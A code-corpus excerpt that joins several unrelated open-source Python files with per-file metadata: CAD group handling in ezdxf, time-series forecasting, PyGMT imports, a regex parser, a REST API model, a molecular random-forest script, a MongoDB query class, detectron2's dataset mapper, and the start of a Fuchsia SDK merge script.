# no owner -> no layout association
if entity.dxf.owner is None:
return False
owner = db.get(entity.dxf.owner)
# owner does not exist or is destroyed -> no layout association
if owner is None or not owner.is_alive:
return False
# owner block_record.layout is 0 if entity is in a block definition,
# which is not allowed:
valid = owner.dxf.layout != '0'
if not valid:
logger.debug(
f"{str(entity)} in {str(self)} is located in a block layout, "
f"which is not allowed")
return valid
def _filter_invalid_entities(self, db: 'EntityDB') -> List[DXFEntity]:
assert db is not None
return [e for e in self._data
if e.is_alive and self._has_valid_owner(e, db)]
def purge(self, db: 'EntityDB') -> None:
""" Remove invalid group entities. """
self._data = self._filter_invalid_entities(db)
def all_entities_on_same_layout(entities: Iterable[DXFEntity]):
""" Check if all entities are on the same layout (model space or any paper
layout but not block).
"""
owners = set(entity.dxf.owner for entity in entities)
# 0 for no entities; 1 for all entities on the same layout
return len(owners) < 2
class GroupCollection(ObjectCollection):
def __init__(self, doc: 'Drawing'):
super().__init__(doc, dict_name='ACAD_GROUP', object_type='GROUP')
self._next_unnamed_number = 0
def groups(self) -> Iterable[DXFGroup]:
""" Iterable of all existing groups. """
for name, group in self:
yield group
def next_name(self) -> str:
name = self._next_name()
while name in self:
name = self._next_name()
return name
def _next_name(self) -> str:
self._next_unnamed_number += 1
return f"*A{self._next_unnamed_number}"
def new(self, name: str = None, description: str = "",
selectable: bool = True) -> DXFGroup:
r""" Creates a new group. If `name` is ``None`` an unnamed group is
created, which has an automatically generated name like "\*Annnn".
Args:
name: group name as string
description: group description as string
selectable: group is selectable if ``True``
"""
if name in self:
raise const.DXFValueError(f"GROUP '{name}' already exists.")
if name is None:
name = self.next_name()
unnamed = 1
else:
unnamed = 0
# The group name isn't stored in the group entity itself.
dxfattribs = {
'description': description,
'unnamed': unnamed,
'selectable': int(bool(selectable)),
}
return cast(DXFGroup, self._new(name, dxfattribs))
def delete(self, group: Union[DXFGroup, str]) -> None:
""" Delete `group`, `group` can be an object of type :class:`DXFGroup`
or a group name as string.
"""
# Delete group by name:
if isinstance(group, str):
name = group
elif group.dxftype() == 'GROUP':
name = get_group_name(group, self.entitydb)
else:
raise TypeError(group.dxftype())
if name in self:
super().delete(name)
else:
raise const.DXFValueError("GROUP not in group table registered.")
def audit(self, auditor: 'Auditor') -> None:
""" Removes empty groups and invalid handles from all groups. """
trash = []
for name, group in self:
group.audit(auditor)
if not len(group): # remove empty group
# do not delete groups while iterating over groups!
trash.append(name)
# now delete empty groups
for name in trash:
auditor.fixed_error(
code=AuditError.REMOVE_EMPTY_GROUP,
message=f'Removed empty group "{name}".',
)
self.delete(name)
def get_group_name(group: DXFGroup, db: 'EntityDB') -> str:
""" Get name of `group`. """
group_table = cast('Dictionary', db[group.dxf.owner])
for name, entity in group_table.items():
if entity is group:
return name
| src/ezdxf/entities/dxfgroups.py | 11,294 | Groups are not allowed in block definitions, and each entity can only
reside in one group, so cloning of groups creates also new entities.
Returns ``True`` if item is in :class:`DXFGroup`. `item` has to be
a handle string or an object of type :class:`DXFEntity` or inherited.
Returns entities by standard Python indexing and slicing.
Iterate over all DXF entities in :class:`DXFGroup` as instances of
:class:`DXFGraphic` or inherited (LINE, CIRCLE, ...).
Returns the count of DXF entities in :class:`DXFGroup`.
Check if all entities are on the same layout (model space or any paper
layout but not block).
Remove invalid handles from :class:`DXFGroup`.
Invalid handles are: deleted entities, not all entities in the same
layout or entities in a block layout.
Removes empty groups and invalid handles from all groups.
Remove all entities from :class:`DXFGroup`, does not delete any
drawing entities referenced by this group.
Delete `group`, `group` can be an object of type :class:`DXFGroup`
or a group name as string.
Context manager which yields all the group entities as
standard Python list::
with group.edit_data() as data:
# add new entities to a group
data.append(modelspace.add_line((0, 0), (3, 0)))
# remove last entity from a group
data.pop()
Export entity specific data as DXF tags.
Add `entities` to :class:`DXFGroup`.
Get name of `group`.
Iterable of all existing groups.
Iterable of handles of all DXF entities in :class:`DXFGroup`.
Creates a new group. If `name` is ``None`` an unnamed group is
created, which has an automatically generated name like "\*Annnn".
Args:
name: group name as string
description: group description as string
selectable: group is selectable if ``True``
Remove invalid group entities.
Set `entities` as new group content, entities should be an iterable
:class:`DXFGraphic` or inherited (LINE, CIRCLE, ...).
Raises :class:`DXFValueError` if not all entities be on the same layout
(modelspace or any paperspace layout but not block)
Copyright (c) 2019-2020, Manfred Moitzi License: MIT-License Group description 1 = Unnamed 0 = Named 1 = Selectable 0 = Not selectable 340: Hard-pointer handle to entity in group (one entry per object) only needed at the loading stage First store handles, because at this point, objects are not stored in the EntityDB: export even empty groups all referenced entities are stored in _data Remove destroyed or invalid entities: no owner -> no layout association owner does not exist or is destroyed -> no layout association owner block_record.layout is 0 if entity is in a block definition, which is not allowed: 0 for no entities; 1 for all entities on the same layout The group name isn't stored in the group entity itself. Delete group by name: remove empty group do not delete groups while iterating over groups! now delete empty groups | 2,866 | en | 0.823031 |
import numpy as np
import pandas as pd
from pylab import rcParams
from sklearn.metrics import mean_absolute_error, mean_squared_error
# Additional custom functions
from cases.industrial.processing import multi_automl_fit_forecast, plot_results
from fedot.core.constants import BEST_QUALITY_PRESET_NAME
from fedot.core.data.multi_modal import prepare_multimodal_data
rcParams['figure.figsize'] = 15, 7
if __name__ == '__main__':
# Below is an example of multivariate time series forecasting.
# An example of how forecasts can be made is presented and a simple
# validation is given on a single block which length is equal to the
# length of the forecast horizon.
# Define forecast horizon and read dataframe
forecast_length = 20
df = pd.read_csv('pw_dataset.csv', parse_dates=['datetime'])
# Wrap time series data into InputData class
features_to_use = ['wind_power_kWh', 'diesel_time_h', 'wind_time_h',
'velocity_max_msec', 'velocity_mean_msec', 'tmp_grad',
'diesel_fuel_kWh']
ts = np.array(df['diesel_fuel_kWh'])
mm_train, mm_test, = prepare_multimodal_data(dataframe=df,
features=features_to_use,
forecast_length=forecast_length)
# Prepare parameters for algorithm launch
# timeout 5 - means that AutoML algorithm will work for 5 minutes
timeout = 0.5
composer_params = {'max_depth': 6,
'max_arity': 3,
'pop_size': 20,
'num_of_generations': 20,
'preset': BEST_QUALITY_PRESET_NAME,
'metric': 'rmse',
'cv_folds': None,
'validation_blocks': None}
forecast, obtained_pipeline = multi_automl_fit_forecast(mm_train, mm_test,
timeout, composer_params,
ts, forecast_length,
vis=True)
mse_metric = mean_squared_error(ts[-forecast_length:], forecast, squared=False)
mae_metric = mean_absolute_error(ts[-forecast_length:], forecast)
print(f'MAE - {mae_metric:.2f}')
print(f'RMSE - {mse_metric:.2f}')
# Save obtained pipeline
obtained_pipeline.save('best')
# Visualise predictions
plot_results(actual_time_series=ts,
predicted_values=forecast,
len_train_data=len(ts) - forecast_length)
| cases/industrial/multivariate_forecasting.py | 2,600 | Additional custom functions Below is an example of multivariate time series forecasting. An example of how forecasts can be made is presented and a simple validation is given on a single block which length is equal to the length of the forecast horizon. Define forecast horizon and read dataframe Wrap time series data into InputData class Prepare parameters for algorithm launch timeout 5 - means that AutoML algorithm will work for 5 minutes Save obtained pipeline Visualise predictions | 488 | en | 0.8607 |
"""
Source code for PyGMT modules.
"""
# pylint: disable=import-outside-toplevel
from pygmt.src.basemap import basemap
from pygmt.src.blockm import blockmean, blockmedian
from pygmt.src.coast import coast
from pygmt.src.colorbar import colorbar
from pygmt.src.config import config
from pygmt.src.contour import contour
from pygmt.src.grd2cpt import grd2cpt
from pygmt.src.grdcontour import grdcontour
from pygmt.src.grdcut import grdcut
from pygmt.src.grdfilter import grdfilter
from pygmt.src.grdimage import grdimage
from pygmt.src.grdinfo import grdinfo
from pygmt.src.grdtrack import grdtrack
from pygmt.src.grdview import grdview
from pygmt.src.image import image
from pygmt.src.info import info
from pygmt.src.inset import inset
from pygmt.src.legend import legend
from pygmt.src.logo import logo
from pygmt.src.makecpt import makecpt
from pygmt.src.meca import meca
from pygmt.src.plot import plot
from pygmt.src.plot3d import plot3d
from pygmt.src.rose import rose
from pygmt.src.solar import solar
from pygmt.src.subplot import set_panel, subplot
from pygmt.src.surface import surface
from pygmt.src.text import text_ as text # "text" is an argument within "text_"
from pygmt.src.which import which
from pygmt.src.x2sys_cross import x2sys_cross
from pygmt.src.x2sys_init import x2sys_init
| pygmt/src/__init__.py | 1,300 | Source code for PyGMT modules.
pylint: disable=import-outside-toplevel "text" is an argument within "text_" | 109 | en | 0.583758 |
# -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import, unicode_literals
from parser_base import RegexParser
import model
class RegexSemantics(object):
def __init__(self):
super(RegexSemantics, self).__init__()
self._count = 0
def START(self, ast):
return model.Regex(ast)
def CHOICE(self, ast):
return model.Choice(ast.opts)
def SEQUENCE(self, ast):
if not ast.terms:
return model.Empty()
elif len(ast.terms) < 2:
return ast.terms[0]
else:
return model.Sequence(ast.terms)
def CLOSURE(self, ast):
return model.Closure(ast)
def SUBEXP(self, ast):
return ast
def LITERAL(self, ast):
return model.Literal(ast)
def translate(regex, trace=False):
parser = RegexParser(trace=trace, semantics=RegexSemantics())
model = parser.parse(regex, 'START')
model.set_rule_numbers()
return model.render()
| examples/regex/regex_parser.py | 993 | -*- coding: utf-8 -*- | 21 | en | 0.767281 |
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_7 import models
class VolumeSnapshotGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'more_items_remaining': 'bool',
'total_item_count': 'int',
'continuation_token': 'str',
'items': 'list[VolumeSnapshot]',
'total': 'list[VolumeSnapshot]'
}
attribute_map = {
'more_items_remaining': 'more_items_remaining',
'total_item_count': 'total_item_count',
'continuation_token': 'continuation_token',
'items': 'items',
'total': 'total'
}
required_args = {
}
def __init__(
self,
more_items_remaining=None, # type: bool
total_item_count=None, # type: int
continuation_token=None, # type: str
items=None, # type: List[models.VolumeSnapshot]
total=None, # type: List[models.VolumeSnapshot]
):
"""
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[VolumeSnapshot]): Returns a list of all items after filtering. The values are displayed for each name where meaningful. If `total_only=true`, the `items` list will be empty.
total (list[VolumeSnapshot]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
"""
if more_items_remaining is not None:
self.more_items_remaining = more_items_remaining
if total_item_count is not None:
self.total_item_count = total_item_count
if continuation_token is not None:
self.continuation_token = continuation_token
if items is not None:
self.items = items
if total is not None:
self.total = total
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `VolumeSnapshotGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(VolumeSnapshotGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VolumeSnapshotGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| pypureclient/flasharray/FA_2_7/models/volume_snapshot_get_response.py | 5,392 | Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
Returns true if both objects are equal
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[VolumeSnapshot]): Returns a list of all items after filtering. The values are displayed for each name where meaningful. If `total_only=true`, the `items` list will be empty.
total (list[VolumeSnapshot]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
Returns true if both objects are not equal
For `print` and `pprint`
Returns the model properties as a dict
Returns the string representation of the model
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
coding: utf-8 type: bool type: int type: str type: List[models.VolumeSnapshot] type: List[models.VolumeSnapshot] | 2,102 | en | 0.698974 |
"""A fingerprint + random forest model.
Try to generate independent and identically distributed figerprint as decoy.
"""
import os
import sys
import json
import argparse
import numpy as np
from pathlib import Path
from tqdm import tqdm
import scipy.sparse as sp
from scipy.spatial import distance
from multiprocessing import Pool
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit import DataStructs
from rdkit.Chem import Descriptors
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import RandomForestRegressor
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-i', '--index', required=True)
parser.add_argument(
'-d', '--datadir', required=True, help="pdbbind datadir, like v2018")
parser.add_argument(
'-u', '--uclust', help="uclust output, format: https://www.drive5.com/usearch/manual/opt_uc.html")
args = parser.parse_args()
DATADIR = Path(args.datadir)
def read_index(index_file):
codes = []
pKs = []
with open(index_file) as f:
for i in f:
if i[0] == '#': continue
code, reso, year, pK, *others = i.split()
codes.append(code)
pKs.append(float(pK))
return codes, pKs
def getProp(mol):
mw = Descriptors.ExactMolWt(mol)
logp = Descriptors.MolLogP(mol)
rotb = Descriptors.NumRotatableBonds(mol)
hbd = Descriptors.NumHDonors(mol)
hba = Descriptors.NumHAcceptors(mol)
q = Chem.GetFormalCharge(mol)
return tuple([mw, logp, rotb, hbd, hba, q])
def load_fps(codes):
print("Loading ligand fingerprint")
fps = []
for i, code in tqdm(enumerate(codes), total=len(codes)):
# already converted ligand.mol2 to ligand.pdb by babel
path = DATADIR / code / (code + '_ligand.pdb')
if not path.exists():
fps.append(None)
continue
mol = Chem.MolFromPDBFile(str(path))
if mol is None:
fps.append(None)
continue
# fp = AllChem.GetMorganFingerprintAsBitVect(mol, 2, nBits=512)
fp = getProp(mol)
fps.append(fp)
notNone = sum([1 for i in fps if i is not None])
print('succeed loaded {}/{}'.format(notNone, len(codes)))
return fps
def load_clust(uclust_file, codes):
clust_nums = [None for i in codes]
all_clust_nums = []
labels = []
with open(uclust_file) as f:
for line in f:
fields = line.split()
all_clust_nums.append( int(fields[1]))
labels.append(fields[8])
for i, code in enumerate(codes):
try:
idx = labels.index(code)
clust_nums[i] = all_clust_nums[idx]
except ValueError:
continue
return clust_nums
codes, pKs = read_index(args.index)
fps = load_fps(codes)
Nones = [i for i in range(len(codes)) if fps[i] is None]
fps = [j for i,j in enumerate(fps) if i not in Nones]
pKs = [j for i,j in enumerate(pKs) if i not in Nones]
codes = [j for i,j in enumerate(codes) if i not in Nones]
X = np.array(fps)
if args.uclust:
clust_nums = load_clust(args.uclust, codes)
Nones.extend([i for i in range(len(codes)) if clust_nums[i] is None])
Nones = set(Nones)
fps = [j for i,j in enumerate(fps) if i not in Nones]
pKs = [j for i,j in enumerate(pKs) if i not in Nones]
codes = [j for i,j in enumerate(codes) if i not in Nones]
clust_nums = [j for i,j in enumerate(clust_nums) if i not in Nones]
clust_nums = np.array(clust_nums, dtype=int)
join_clust = np.zeros_like(clust_nums)
for i, num in enumerate(set(clust_nums)):
mask = clust_nums == num
# all cluster smaller than 5 will set as cluster 0
if sum(mask) >= 10:
join_clust[mask] = i+1
nb_clust = max(join_clust) + 1
print(join_clust)
one_hot = np.eye(nb_clust, dtype=int)[join_clust]
X = np.hstack((one_hot, fps))
X = one_hot
print(X.shape)
pKs = np.array(pKs)
# filter None
for seed in (111, 222, 333):
np.random.seed(seed)
N = len(codes)
perm = np.random.permutation(N)
train_idx = perm[:int(N*0.8)]
valid_idx = perm[int(N*0.8):int(N*0.9)]
test_idx = perm[int(N*0.9):]
train_X = X[train_idx]
test_X = X[test_idx]
train_pKs = pKs[train_idx]
test_pKs = pKs[test_idx]
clf = RandomForestRegressor(
n_estimators=10,
max_depth=15,
# min_samples_split=10,
min_samples_split=5,
min_samples_leaf=1,
random_state=0,
n_jobs=8,
)
clf.fit(train_X, train_pKs)
pred_pKs = clf.predict(test_X)
r2 = np.corrcoef(test_pKs, pred_pKs)[0,1] ** 2
print('seed {} r2: {}'.format(seed, r2))
| pdbbind/props_random_forest.py | 4,767 | A fingerprint + random forest model.
Try to generate independent and identically distributed figerprint as decoy.
already converted ligand.mol2 to ligand.pdb by babel fp = AllChem.GetMorganFingerprintAsBitVect(mol, 2, nBits=512) all cluster smaller than 5 will set as cluster 0 filter None min_samples_split=10, | 313 | en | 0.686599 |
from datanator_query_python.util import mongo_util
from pymongo.collation import Collation, CollationStrength
class QueryXmdb:
def __init__(self, username=None, password=None, server=None, authSource='admin',
database='datanator', max_entries=float('inf'), verbose=True, collection_str='ecmdb',
readPreference='nearest', replicaSet=None):
self.mongo_manager = mongo_util.MongoUtil(MongoDB=server, username=username,
password=password, authSource=authSource, db=database,
readPreference=readPreference, replicaSet=replicaSet)
self.collation = Collation(locale='en', strength=CollationStrength.SECONDARY)
self.max_entries = max_entries
self.verbose = verbose
self.client, self.db, self.collection = self.mongo_manager.con_db(collection_str)
self.collection_str = collection_str
def get_all_concentrations(self, projection={'_id': 0, 'inchi': 1,
'inchikey': 1, 'smiles': 1, 'name': 1}):
"""Get all entries that have concentration values
Args:
projection (dict, optional): mongodb query projection. Defaults to {'_id': 0, 'inchi': 1,'inchikey': 1, 'smiles': 1, 'name': 1}.
Returns:
(list): all results that meet the constraint.
"""
result = []
query = {'concentrations': {'$ne': None} }
docs = self.collection.find(filter=query, projection=projection)
for doc in docs:
result.append(doc)
return result
def get_name_by_inchikey(self, inchikey):
"""Get metabolite's name by its inchikey
Args:
inchikey (:obj:`str`): inchi key of metabolite
Return:
(:obj:`str`): name of metabolite
"""
query = {'inchikey': inchikey}
projection = {'_id': 0, 'name': 1}
doc = self.collection.find_one(filter=query, projection=projection, collation=self.collation)
if doc is None:
return 'No metabolite found.'
else:
return doc['name']
def get_standard_ids_by_id(self, _id):
"""Get chebi_id, pubmed_id, and kegg_id from
database specific id.
Args:
_id (:obj:`str`): Database specific ID.
Return:
(:obj:`dict`): Dictionary containing the information.
"""
if self.collection_str == 'ecmdb':
db_id = 'm2m_id'
else:
db_id = 'ymdb_id'
query = {db_id: _id}
# projection = {'hmdb_id': 1, 'chebi_id': 1, 'kegg_id': 1, '_id': 0}
doc = self.collection.find_one(filter=query)
if doc is None:
return {}
else:
return doc | datanator_query_python/query/query_xmdb.py | 2,831 | Get all entries that have concentration values
Args:
projection (dict, optional): mongodb query projection. Defaults to {'_id': 0, 'inchi': 1,'inchikey': 1, 'smiles': 1, 'name': 1}.
Returns:
(list): all results that meet the constraint.
Get metabolite's name by its inchikey
Args:
inchikey (:obj:`str`): inchi key of metabolite
Return:
(:obj:`str`): name of metabolite
Get chebi_id, pubmed_id, and kegg_id from
database specific id.
Args:
_id (:obj:`str`): Database specific ID.
Return:
(:obj:`dict`): Dictionary containing the information.
projection = {'hmdb_id': 1, 'chebi_id': 1, 'kegg_id': 1, '_id': 0} | 639 | en | 0.539199 |
# Copyright (c) Facebook, Inc. and its affiliates.
import copy
import logging
import numpy as np
from typing import List, Optional, Union
import torch
from detectron2.config import configurable
from . import detection_utils as utils
from . import transforms as T
"""
This file contains the default mapping that's applied to "dataset dicts".
"""
__all__ = ["DatasetMapper"]
class DatasetMapper:
"""
A callable which takes a dataset dict in Detectron2 Dataset format,
and map it into a format used by the model.
This is the default callable to be used to map your dataset dict into training data.
You may need to follow it to implement your own one for customized logic,
such as a different way to read or transform images.
See :doc:`/tutorials/data_loading` for details.
The callable currently does the following:
1. Read the image from "file_name"
2. Applies cropping/geometric transforms to the image and annotations
3. Prepare data and annotations to Tensor and :class:`Instances`
"""
@configurable
def __init__(
self,
is_train: bool,
*,
augmentations: List[Union[T.Augmentation, T.Transform]],
image_format: str,
use_instance_mask: bool = False,
use_keypoint: bool = False,
instance_mask_format: str = "polygon",
keypoint_hflip_indices: Optional[np.ndarray] = None,
precomputed_proposal_topk: Optional[int] = None,
recompute_boxes: bool = False,
):
"""
NOTE: this interface is experimental.
Args:
is_train: whether it's used in training or inference
augmentations: a list of augmentations or deterministic transforms to apply
image_format: an image format supported by :func:`detection_utils.read_image`.
use_instance_mask: whether to process instance segmentation annotations, if available
use_keypoint: whether to process keypoint annotations if available
instance_mask_format: one of "polygon" or "bitmask". Process instance segmentation
masks into this format.
keypoint_hflip_indices: see :func:`detection_utils.create_keypoint_hflip_indices`
precomputed_proposal_topk: if given, will load pre-computed
proposals from dataset_dict and keep the top k proposals for each image.
recompute_boxes: whether to overwrite bounding box annotations
by computing tight bounding boxes from instance mask annotations.
"""
if recompute_boxes:
assert use_instance_mask, "recompute_boxes requires instance masks"
# fmt: off
self.is_train = is_train
self.augmentations = T.AugmentationList(augmentations)
self.image_format = image_format
self.use_instance_mask = use_instance_mask
self.instance_mask_format = instance_mask_format
self.use_keypoint = use_keypoint
self.keypoint_hflip_indices = keypoint_hflip_indices
self.proposal_topk = precomputed_proposal_topk
self.recompute_boxes = recompute_boxes
# fmt: on
logger = logging.getLogger(__name__)
mode = "training" if is_train else "inference"
logger.info(f"[DatasetMapper] Augmentations used in {mode}: {augmentations}")
@classmethod
def from_config(cls, cfg, is_train: bool = True):
augs = utils.build_augmentation(cfg, is_train)
if cfg.INPUT.CROP.ENABLED and is_train:
augs.insert(0, T.RandomCrop(cfg.INPUT.CROP.TYPE, cfg.INPUT.CROP.SIZE))
recompute_boxes = cfg.MODEL.MASK_ON
else:
recompute_boxes = False
ret = {
"is_train": is_train,
"augmentations": augs,
"image_format": cfg.INPUT.FORMAT,
"use_instance_mask": cfg.MODEL.MASK_ON,
"instance_mask_format": cfg.INPUT.MASK_FORMAT,
"use_keypoint": cfg.MODEL.KEYPOINT_ON,
"recompute_boxes": recompute_boxes,
}
if cfg.MODEL.KEYPOINT_ON:
ret["keypoint_hflip_indices"] = utils.create_keypoint_hflip_indices(cfg.DATASETS.TRAIN)
if cfg.MODEL.LOAD_PROPOSALS:
ret["precomputed_proposal_topk"] = (
cfg.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TRAIN
if is_train
else cfg.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TEST
)
return ret
def __call__(self, dataset_dict):
"""
Args:
dataset_dict (dict): Metadata of one image, in Detectron2 Dataset format.
Returns:
dict: a format that builtin models in detectron2 accept
"""
dataset_dict = copy.deepcopy(dataset_dict) # it will be modified by code below
# USER: Write your own image loading if it's not from a file
image = utils.read_image(dataset_dict["file_name"], format=self.image_format)
utils.check_image_size(dataset_dict, image)
# USER: Remove if you don't do semantic/panoptic segmentation.
if "sem_seg_file_name" in dataset_dict:
sem_seg_gt = utils.read_image(dataset_dict.pop("sem_seg_file_name"), "L").squeeze(2)
else:
sem_seg_gt = None
aug_input = T.AugInput(image, sem_seg=sem_seg_gt)
transforms = self.augmentations(aug_input)
image, sem_seg_gt = aug_input.image, aug_input.sem_seg
image_shape = image.shape[:2] # h, w
# Pytorch's dataloader is efficient on torch.Tensor due to shared-memory,
# but not efficient on large generic data structures due to the use of pickle & mp.Queue.
# Therefore it's important to use torch.Tensor.
dataset_dict["image"] = torch.as_tensor(np.ascontiguousarray(image.transpose(2, 0, 1)))
if sem_seg_gt is not None:
dataset_dict["sem_seg"] = torch.as_tensor(sem_seg_gt.astype("long"))
# USER: Remove if you don't use pre-computed proposals.
# Most users would not need this feature.
if self.proposal_topk is not None:
utils.transform_proposals(
dataset_dict, image_shape, transforms, proposal_topk=self.proposal_topk
)
if not self.is_train:
# USER: Modify this if you want to keep them for some reason.
# dataset_dict.pop("annotations", None)
dataset_dict.pop("sem_seg_file_name", None)
return dataset_dict
if "annotations" in dataset_dict:
# USER: Modify this if you want to keep them for some reason.
for anno in dataset_dict["annotations"]:
if not self.use_instance_mask:
anno.pop("segmentation", None)
if not self.use_keypoint:
anno.pop("keypoints", None)
# USER: Implement additional transformations if you have other types of data
annos = [
utils.transform_instance_annotations(
obj, transforms, image_shape, keypoint_hflip_indices=self.keypoint_hflip_indices
)
for obj in dataset_dict.pop("annotations")
if obj.get("iscrowd", 0) == 0
]
instances = utils.annotations_to_instances(
annos, image_shape, mask_format=self.instance_mask_format
)
# After transforms such as cropping are applied, the bounding box may no longer
# tightly bound the object. As an example, imagine a triangle object
# [(0,0), (2,0), (0,2)] cropped by a box [(1,0),(2,2)] (XYXY format). The tight
# bounding box of the cropped triangle should be [(1,0),(2,1)], which is not equal to
# the intersection of original bounding box and the cropping box.
if self.recompute_boxes:
instances.gt_boxes = instances.gt_masks.get_bounding_boxes()
dataset_dict["instances"] = utils.filter_empty_instances(instances)
return dataset_dict
| detectron2/data/dataset_mapper.py | 8,113 | A callable which takes a dataset dict in Detectron2 Dataset format,
and map it into a format used by the model.
This is the default callable to be used to map your dataset dict into training data.
You may need to follow it to implement your own one for customized logic,
such as a different way to read or transform images.
See :doc:`/tutorials/data_loading` for details.
The callable currently does the following:
1. Read the image from "file_name"
2. Applies cropping/geometric transforms to the image and annotations
3. Prepare data and annotations to Tensor and :class:`Instances`
Args:
dataset_dict (dict): Metadata of one image, in Detectron2 Dataset format.
Returns:
dict: a format that builtin models in detectron2 accept
NOTE: this interface is experimental.
Args:
is_train: whether it's used in training or inference
augmentations: a list of augmentations or deterministic transforms to apply
image_format: an image format supported by :func:`detection_utils.read_image`.
use_instance_mask: whether to process instance segmentation annotations, if available
use_keypoint: whether to process keypoint annotations if available
instance_mask_format: one of "polygon" or "bitmask". Process instance segmentation
masks into this format.
keypoint_hflip_indices: see :func:`detection_utils.create_keypoint_hflip_indices`
precomputed_proposal_topk: if given, will load pre-computed
proposals from dataset_dict and keep the top k proposals for each image.
recompute_boxes: whether to overwrite bounding box annotations
by computing tight bounding boxes from instance mask annotations.
Copyright (c) Facebook, Inc. and its affiliates. fmt: off fmt: on it will be modified by code below USER: Write your own image loading if it's not from a file USER: Remove if you don't do semantic/panoptic segmentation. h, w Pytorch's dataloader is efficient on torch.Tensor due to shared-memory, but not efficient on large generic data structures due to the use of pickle & mp.Queue. Therefore it's important to use torch.Tensor. USER: Remove if you don't use pre-computed proposals. Most users would not need this feature. USER: Modify this if you want to keep them for some reason. dataset_dict.pop("annotations", None) USER: Modify this if you want to keep them for some reason. USER: Implement additional transformations if you have other types of data After transforms such as cropping are applied, the bounding box may no longer tightly bound the object. As an example, imagine a triangle object [(0,0), (2,0), (0,2)] cropped by a box [(1,0),(2,2)] (XYXY format). The tight bounding box of the cropped triangle should be [(1,0),(2,1)], which is not equal to the intersection of original bounding box and the cropping box. | 2,789 | en | 0.84747 |
#!/usr/bin/env python3.8
# Copyright 2018 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import contextlib
import errno
import json
import os
import shutil
import sys
import tarfile
import tempfile
from functools import total_ordering
@total_ordering
class Part(object):
def __init__(self, json):
self.meta = json['meta']
self.type = json['type']
def __lt__(self, other):
return self.meta < other.meta and self.type < other.type
def __eq__(self, other):
return (
isinstance(other, self.__class__) and self.meta == other.meta and
self.type == other.type)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.meta, self.type))
@contextlib.contextmanager
def _open_archive(archive, directory):
'''Manages a directory in which an existing SDK is laid out.'''
if directory:
yield directory
elif archive:
temp_dir = tempfile.mkdtemp(prefix='fuchsia-merger')
# Extract the tarball into the temporary directory.
# This is vastly more efficient than accessing files one by one via
# the tarfile API.
with tarfile.open(archive) as archive_file:
archive_file.extractall(temp_dir)
try:
yield temp_dir
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
else:
raise Exception('Error: archive or directory must be set')
@contextlib.contextmanager
def _open_output(archive, directory):
'''Manages the output of this script.'''
if directory:
# Remove any existing output.
shutil.rmtree(directory, ignore_errors=True)
yield directory
elif archive:
temp_dir = tempfile.mkdtemp(prefix='fuchsia-merger')
try:
yield temp_dir
# Write the archive file.
with tarfile.open(archive, "w:gz") as archive_file:
archive_file.add(temp_dir, arcname='')
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
else:
raise Exception('Error: archive or directory must be set')
def _get_manifest(sdk_dir):
